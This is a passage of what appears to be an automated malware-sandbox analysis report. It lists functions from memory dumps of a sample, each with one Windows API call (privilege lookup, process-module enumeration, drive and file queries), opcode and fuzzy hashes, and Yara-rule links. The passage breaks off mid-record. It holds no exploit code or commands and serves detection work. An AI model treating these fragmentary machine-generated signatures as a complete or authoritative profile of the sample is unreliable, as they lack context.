                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 87198fb901c9501a3830797df8d0cbe1fd5bf27cb47d30e7c492e78b02135dda
                                                                                            • Instruction ID: 31bb98ef5245bdfb539af5abfcfc534a6f70c226c3da00b79ccb13cc1f712178
                                                                                            • Opcode Fuzzy Hash: 87198fb901c9501a3830797df8d0cbe1fd5bf27cb47d30e7c492e78b02135dda
                                                                                            • Instruction Fuzzy Hash: 5711AC72500304EFEB21CF61DC85FAAFBACEF04320F14896AF949DA241D671A9448BB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 0066B0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 15778dc947fcb41dc7f3574505087bb670a38a782855fb84728ca0bd02a2c914
                                                                                            • Instruction ID: 0e48b5bf219eddb4f6174172d87d7de34ecf0e49fa56a61256a7f44faeba1b02
                                                                                            • Opcode Fuzzy Hash: 15778dc947fcb41dc7f3574505087bb670a38a782855fb84728ca0bd02a2c914
                                                                                            • Instruction Fuzzy Hash: 9E117C71600300EFEB20CF15DC85FABBBA8EF45760F14846AED09CB641D774E9448AB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: afe1cd52a0bbe9a8e5e1fa926ac02127fff23b880edf804e4eb87bf89f935803
                                                                                            • Instruction ID: 13f129ce8faecc467cd456d662d4800b1c80c6614ff31b4f84274f807d2f9ba1
                                                                                            • Opcode Fuzzy Hash: afe1cd52a0bbe9a8e5e1fa926ac02127fff23b880edf804e4eb87bf89f935803
                                                                                            • Instruction Fuzzy Hash: 542192725083809FDB21CF25DC45B96FFB4EF46320F0884AEED858B563D235A448DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 027C0FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: d96b79b6fa5b690a84d0ff62c64ad4dafa441ca1584cac482155a0e3eb0ec958
                                                                                            • Instruction ID: 5bf02961bed625fdc76f17e979d4943d727e8cbd83413e46ddb2190591926626
                                                                                            • Opcode Fuzzy Hash: d96b79b6fa5b690a84d0ff62c64ad4dafa441ca1584cac482155a0e3eb0ec958
                                                                                            • Instruction Fuzzy Hash: 4B219D7150D3C09FDB12CB25CC55B92BFB4AF03224F1C84DAE8888F293D2649848CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0066AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: d3789bf1fccf96c2ed4479ef15f11b88dcc080bc2d8e5e5be59ce5458feea50b
                                                                                            • Instruction ID: fd1a6e4e4a47fa1455b140223a96d3fd833a2e54f186da86b6218d930addc3f4
                                                                                            • Opcode Fuzzy Hash: d3789bf1fccf96c2ed4479ef15f11b88dcc080bc2d8e5e5be59ce5458feea50b
                                                                                            • Instruction Fuzzy Hash: FE2184716053809FDB21CF65DC44B92FFE8EF56210F0884AAED49DB252D275E804CB72
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: 1b63a4d22b32f0cf1d03f47f475c64a705c329c6eaf7a49051d9289e4b3830de
                                                                                            • Instruction ID: ef73e209bba2cb2cf2f93489e2033dd42084fcd70110cc48f49ad42afd392565
                                                                                            • Opcode Fuzzy Hash: 1b63a4d22b32f0cf1d03f47f475c64a705c329c6eaf7a49051d9289e4b3830de
                                                                                            • Instruction Fuzzy Hash: 8221A1725093C09FEB128B25DC55B92BFA4EF07320F0984EBDD858F263D234A948DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 027C1148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: f9b198e067b0f86618ca3c80d57ffaa4d715ea2d77dfa3c0232661e278c58f2f
                                                                                            • Instruction ID: 4b3cd49c96de20617766319858821f8aaf5670bf162d06c7cdd55ccc2ec8fc8d
                                                                                            • Opcode Fuzzy Hash: f9b198e067b0f86618ca3c80d57ffaa4d715ea2d77dfa3c0232661e278c58f2f
                                                                                            • Instruction Fuzzy Hash: BD216D6140D3C49FD7138B25DC54A62BFB4EF57720F5980DBD8848F2A3D2696808D7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 0066AFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 2818020b45a5d1041a09fb893aed024cae767115031f9e12b5f8ce28e15a07c4
                                                                                            • Instruction ID: d0d9cb00cce372db6d3e215270665fcd32838f2629f9000d301894de3a4f3161
                                                                                            • Opcode Fuzzy Hash: 2818020b45a5d1041a09fb893aed024cae767115031f9e12b5f8ce28e15a07c4
                                                                                            • Instruction Fuzzy Hash: 3B11C172500300EFEB21DF55DC85FAAFBA8EF44720F14846AED09DA281D670A944CBB2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0066BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 28a2b22bc805aca9321bb13b69a1365460570c25676cad88140302fd3b4149d8
                                                                                            • Instruction ID: a380c28128c3ca3bf08362f612d116a5db12cf47bf679afef88155f3557eb5db
                                                                                            • Opcode Fuzzy Hash: 28a2b22bc805aca9321bb13b69a1365460570c25676cad88140302fd3b4149d8
                                                                                            • Instruction Fuzzy Hash: 04119071504384AFDB21CF65CC44B92FFF4EF05210F08849AE9858B662D375A458CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 027C08E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: f8a76b916fcb2fa1a5ad427450868d77f19572e27cd74aa1e2df61477daea214
                                                                                            • Instruction ID: 70097f31ce28d3ee77015bfbbab0fd08b6a8b8e72e5a3bb006ec669e665705bf
                                                                                            • Opcode Fuzzy Hash: f8a76b916fcb2fa1a5ad427450868d77f19572e27cd74aa1e2df61477daea214
                                                                                            • Instruction Fuzzy Hash: 7F11BF72404300EFEB21CF61DC85FA6FBA8EF54720F14896EE9499A241C671A504CBB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0066A39C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 66abaa0840be75dbf5d11f0557c4eb55f8d2a2065820a9edcb5e35dff574b09d
                                                                                            • Instruction ID: ce5a44470fd1a575ac436ca4805dcac770aec489097fe27fb17a8adbc6f0a130
                                                                                            • Opcode Fuzzy Hash: 66abaa0840be75dbf5d11f0557c4eb55f8d2a2065820a9edcb5e35dff574b09d
                                                                                            • Instruction Fuzzy Hash: B1118C714093C09FEB128B25DC54BA2BFB4DF47624F0884DAEDC59F263D265A808DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027C132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 1ffa31d85a29f618af0252b772d1ded9047fb9726347d16bb1ff6a3b724c7a13
                                                                                            • Instruction ID: 4e09d674ed98bf3e549182943778d770966acdecabfa56d2105a645e3389eb98
                                                                                            • Opcode Fuzzy Hash: 1ffa31d85a29f618af0252b772d1ded9047fb9726347d16bb1ff6a3b724c7a13
                                                                                            • Instruction Fuzzy Hash: EC1191715093849FDB118F25DC85B96FFA4EF46220F0984EEED498B653D275A808CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0066AB1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID:
                                                                                            • API String ID: 3899507212-0
                                                                                            • Opcode ID: 1e5e30b89d56acf0ac594fe4ee702d637c08227a2c0764b92d78792fe05ff15c
                                                                                            • Instruction ID: c8a4bfb3c13a1e70636a6f441b1d25e2c36a6751cc2b76a1aba1d1c7507a0170
                                                                                            • Opcode Fuzzy Hash: 1e5e30b89d56acf0ac594fe4ee702d637c08227a2c0764b92d78792fe05ff15c
                                                                                            • Instruction Fuzzy Hash: E0118EB16003008FEB20CF65DC85B96FBD9EB55320F08846ADC09DB742D670E804CA62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32 ref: 0066AA71
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleOutput
                                                                                            • String ID:
                                                                                            • API String ID: 3985236979-0
                                                                                            • Opcode ID: b6f56865a748908923367f4994936d6e96d767b312af1426bc7349fc55092e1b
                                                                                            • Instruction ID: c67a9583547e267b6d6c6ebcfa8880899763268a470296d4149d83daf9d72620
                                                                                            • Opcode Fuzzy Hash: b6f56865a748908923367f4994936d6e96d767b312af1426bc7349fc55092e1b
                                                                                            • Instruction Fuzzy Hash: D511C17540D7C09FD7128B11DC85A92BFA0EF53320F0980DBDD848F263D269A909CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 027C099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: d2fcc8d1f6d84f3c51de8f0170b9ebb31d84631f930e1d497e8c1b5fe8c876ea
                                                                                            • Instruction ID: 1b4c70193a6416d749a74f9921d238768d5d26e856f234e1b8ecea40cc08651d
                                                                                            • Opcode Fuzzy Hash: d2fcc8d1f6d84f3c51de8f0170b9ebb31d84631f930e1d497e8c1b5fe8c876ea
                                                                                            • Instruction Fuzzy Hash: 1111B2714093C09FE712CB25DC55B92FFB4EF47324F0980DADD844B263D265A908CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,F398E8A0,00000000,00000000,00000000,00000000), ref: 027C0819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: fce3456504b0df79a5beceeab11af36fd605a9594b9c125b9d61c0c1fc5cc473
                                                                                            • Instruction ID: f6e3c5639bf640ac72740f117977a0b135f9f4e7c5a6a6aba2f1c9e5d15d6a45
                                                                                            • Opcode Fuzzy Hash: fce3456504b0df79a5beceeab11af36fd605a9594b9c125b9d61c0c1fc5cc473
                                                                                            • Instruction Fuzzy Hash: 5601C071504304EFFB209F11DC86FA6FB98DF44720F24C4AAED089A241D674A904CAE2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleWrite
                                                                                            • String ID:
                                                                                            • API String ID: 2657657451-0
                                                                                            • Opcode ID: 49c676e422330e1d944ca68fbe5bf662c193cf4262a4bebc51f6d8c13e8229aa
                                                                                            • Instruction ID: eeeaf2ed2853f770e5479a2f0acc255c93498076a9cd81d4188b9f191a5fa170
                                                                                            • Opcode Fuzzy Hash: 49c676e422330e1d944ca68fbe5bf662c193cf4262a4bebc51f6d8c13e8229aa
                                                                                            • Instruction Fuzzy Hash: 7F118B76500700DFEB20DF66DC85B66FBA4EF04320F5884AEED498B652D371E408CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 0066ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 214e8ee3dce270e722696ff2fa3c9bcf7085a9f442de2c686311b0668196ed85
                                                                                            • Instruction ID: bdbd4af3d7993f4adc4951321f7c422f64e3ba09896218f6ace7d4a263a7992c
                                                                                            • Opcode Fuzzy Hash: 214e8ee3dce270e722696ff2fa3c9bcf7085a9f442de2c686311b0668196ed85
                                                                                            • Instruction Fuzzy Hash: 831182B59093809FDB11CF55DC85B92BFA4EF52324F0984ABDD488F253D275A908CBA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0066BA7E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: ebb92a1c5a44a55489213ad731fe544c0551e60f02c506294a6c54d8266ab0cf
                                                                                            • Instruction ID: 2ccc1324c8571d083df914a2639fb75a41372e71ca1102fdbc96b532b3a788c3
                                                                                            • Opcode Fuzzy Hash: ebb92a1c5a44a55489213ad731fe544c0551e60f02c506294a6c54d8266ab0cf
                                                                                            • Instruction Fuzzy Hash: 27118E72500704DFDB20CF95DC84B52FBE5EF14310F1888AADD498A612D371E454DB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0066A23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: f068e21d84cde665645ffce7adbe96278f606bf2d64824b124e0ee67c9b258c0
                                                                                            • Instruction ID: b519b675ff9a502cce5f985a8af8e35d9710e54fa39fd70f3a0231ea591a2b0b
                                                                                            • Opcode Fuzzy Hash: f068e21d84cde665645ffce7adbe96278f606bf2d64824b124e0ee67c9b258c0
                                                                                            • Instruction Fuzzy Hash: 30018471900600AFE710DF16DC46B66FBA8FB84A60F14856AED089B741D235F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027C109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: 61f39d91ac019f63c590bab2fd9b0ecab4d577ed70d64551a05efa8c39a42534
                                                                                            • Instruction ID: a469c88a1d58981b051de4a5e038f1fe0f5ba8162a2b73379b5efdb9869adaea
                                                                                            • Opcode Fuzzy Hash: 61f39d91ac019f63c590bab2fd9b0ecab4d577ed70d64551a05efa8c39a42534
                                                                                            • Instruction Fuzzy Hash: 0D018471900600AFE310DF16DC46B66FBA8FB84B60F14856AED089B741D335F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 027C01D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 5a8bbd7b7f9af7b4879aecf2f28502c2a9a9e7cffdecb4f8f29dea890aebf23f
                                                                                            • Instruction ID: 537d72fdef35e7aa40f46b5710ac4710f5b3b012c93c407aefa6cca7c07c2163
                                                                                            • Opcode Fuzzy Hash: 5a8bbd7b7f9af7b4879aecf2f28502c2a9a9e7cffdecb4f8f29dea890aebf23f
                                                                                            • Instruction Fuzzy Hash: A6019E71A00304CFEB10DF25DC8576AFB98EB41320F1884AEDC09CB742D674E404CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleMode
                                                                                            • String ID:
                                                                                            • API String ID: 4145635619-0
                                                                                            • Opcode ID: 8b98782499d3c9cad161835cef4f22bb60eefbf457bba6c7fb2654e7d1ec5755
                                                                                            • Instruction ID: 0be6e4309939fd50ddeb63b5b2621305b82da0cdc031989f32dbd0162e9dbff9
                                                                                            • Opcode Fuzzy Hash: 8b98782499d3c9cad161835cef4f22bb60eefbf457bba6c7fb2654e7d1ec5755
                                                                                            • Instruction Fuzzy Hash: 6001DF71900200DFEB20CF15DC85BA9FBA4EF05720F18C4AADD09CB756E775A844CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027C132F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AttributeConsoleText
                                                                                            • String ID:
                                                                                            • API String ID: 646522457-0
                                                                                            • Opcode ID: 0d9b5c4863c28d88d937324904eb2fe53aa03bec917455cc68082b85ad30b12c
                                                                                            • Instruction ID: 67b95039dd95e03ca6a5ac8f64ac5eac8974d37958bab6bdf94f9f199ce932b2
                                                                                            • Opcode Fuzzy Hash: 0d9b5c4863c28d88d937324904eb2fe53aa03bec917455cc68082b85ad30b12c
                                                                                            • Instruction Fuzzy Hash: 7D019A71904200DFEF108F25DC85BA9FBA4EB05624F9884BEDC098BA42D275A404CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0066A94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 902f115c6ac8521c86018bc360e079c1309c90d2d6ab027d587bd46740dc65d4
                                                                                            • Instruction ID: e54552c921d620dfd408f2c7ba62de0bbcada4a9bbd370593cf0570fc50d80c5
                                                                                            • Opcode Fuzzy Hash: 902f115c6ac8521c86018bc360e079c1309c90d2d6ab027d587bd46740dc65d4
                                                                                            • Instruction Fuzzy Hash: EC016271900600ABD314DF16DC46B26FBA8FB89B20F14815AED085B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 027C0FB0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DriveType
                                                                                            • String ID:
                                                                                            • API String ID: 338552980-0
                                                                                            • Opcode ID: ef018e8357210a5b8e204a1826bf05dad6e2f58ce54dea93931e607a89e094e8
                                                                                            • Instruction ID: 2119d81e5697c207ff7be076e198fd575752705dddb37d162d47fc2b64cc221a
                                                                                            • Opcode Fuzzy Hash: ef018e8357210a5b8e204a1826bf05dad6e2f58ce54dea93931e607a89e094e8
                                                                                            • Instruction Fuzzy Hash: 29017C71904340DFEB20DF25D885B66FB94EB41720F6884AEDC088F246D374E544CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027C0502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: 81654b93eb7406ffa037c5796f7b0814dc10eef28dff2caefb35b53daeeac4eb
                                                                                            • Instruction ID: b5cfe9dbb14444aa2b14f6f66bfec4b3f1a01e47023e7d310867f2e4bb42ce1f
                                                                                            • Opcode Fuzzy Hash: 81654b93eb7406ffa037c5796f7b0814dc10eef28dff2caefb35b53daeeac4eb
                                                                                            • Instruction Fuzzy Hash: 47016271900600ABD314DF16DC46F26FBA8FB89B20F14815AED085B741D275F515CBE6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0066AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLogicalDrives.KERNELBASE ref: 0066ABC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2147500974.000000000066A000.00000040.00000001.sdmp, Offset: 0066A000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DrivesLogical
                                                                                            • String ID:
                                                                                            • API String ID: 999431828-0
                                                                                            • Opcode ID: 6d1fb53aea9ee75c80280dc8ecf5b2cb1ba5e7228697daed1514461f0d6ba648
                                                                                            • Instruction ID: 5846901c44faa54aeeb4930984ba0c005e1caff2021f46615adf86f95757928a
                                                                                            • Opcode Fuzzy Hash: 6d1fb53aea9ee75c80280dc8ecf5b2cb1ba5e7228697daed1514461f0d6ba648
                                                                                            • Instruction Fuzzy Hash: C401DC71804340CFEB10DF95D889BA2FBA4EF40320F58C4AACD099F302D275A804CFA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 027C1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadUILanguage.KERNEL32(?), ref: 027C1148
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.2155524380.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguageThread
                                                                                            • String ID:
                                                                                            • API String ID: 243849632-0
                                                                                            • Opcode ID: e07e240e8d74f0da36f51ff437c39eb1c92c937ac4bce21bd0e4942926766c7b
                                                                                            • Instruction ID: 87d99bb8c0c999c85db934c58fe39e0f5412aa14b88733449643307cb0bcd35e
